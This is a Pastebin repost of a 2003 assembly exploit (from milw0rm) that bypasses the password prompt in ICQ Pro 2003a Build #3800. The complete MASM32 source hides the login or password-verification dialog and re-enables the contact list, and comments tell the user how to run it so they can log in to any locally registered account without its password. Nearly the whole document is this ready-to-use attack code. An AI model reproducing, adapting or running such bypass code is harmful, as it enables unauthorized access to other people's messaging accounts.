API tools faq
paste
Advertisement
FlyFar

ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass

FlyFar
Feb 2nd, 2024
940
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
MPASM 2.38 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. ; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  2. ;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF
  3. ; -------------------------------------------------------------------------
  4. ;
  5. ;  07/02/2003 - ca1-icq.asm
  6. ;  ICQ Password Bypass exploit.
  7. ;  written by Caua Moura Prado (aka ca1)
  8. ;
  9. ;  This exploit allows you to login to ICQ server using any account registered *locally*
  10. ;  no matter the 'save password' option is checked or not. High level security is also bypassed.
  11. ;  All you have to do is run the exploit and set status property using your mouse when the flower
  12. ;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
  13. ;  the exploit again.
  14. ;
  15. ;        uh-oh!
  16. ;         ___    
  17. ;      __/   \__  
  18. ;     /  \___/  \        Vulnerable:
  19. ;     \__/+ +\__/          ICQ Pro 2003a Build #3800
  20. ;     /   ~~~   \
  21. ;     \__/   \__/        Not Vulnerable:
  22. ;        \___/                ICQ Lite alpha Build 1211
  23. ;                               ICQ 2001b and ICQ 2002a
  24. ;    tHe Flaw Power       All other versions were not tested.                      
  25. ;                                                      
  26.                            coded with masm32
  27. ; ________________________________________________________________exploit born in .br
  28.        
  29. .386
  30. .model flat, stdcall
  31. option casemap:none
  32. include \masm32\include\user32.inc
  33. include \masm32\include\kernel32.inc
  34. includelib \masm32\lib\user32.lib
  35. includelib \masm32\lib\kernel32.lib
  36. .data
  37. szTextHigh byte 'Password Verification', 0
  38. szTextLow byte 'Login to server', 0
  39. szClassName byte '#32770', 0
  40. .data?
  41. hWndLogin dword ?
  42. .code
  43. _entrypoint:
  44.  invoke FindWindow, addr szClassName, addr szTextHigh
  45.  mov hWndLogin, eax  
  46.  .if hWndLogin == 0
  47.    invoke FindWindow, addr szClassName, addr szTextLow
  48.    mov hWndLogin, eax
  49.  .endif
  50.  invoke GetParent, hWndLogin
  51.  invoke EnableWindow, eax, 1      ;Enable ICQ contact
  52. list
  53.  invoke ShowWindow, hWndLogin, 0  ;get rid of Login
  54. screen (don't kill this window)
  55. invoke ExitProcess, 0            ;uhuu.. cya! i gotta
  56. sleep!
  57. end _entrypoint
  58.  
  59. ; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  60. ;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF
  61. ; -------------------------------------------------------------------------
  62.  
  63.  
  64.  
  65. ; milw0rm.com [2003-07-09]
  66.            
Tags: Exploit vulnerabilities
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!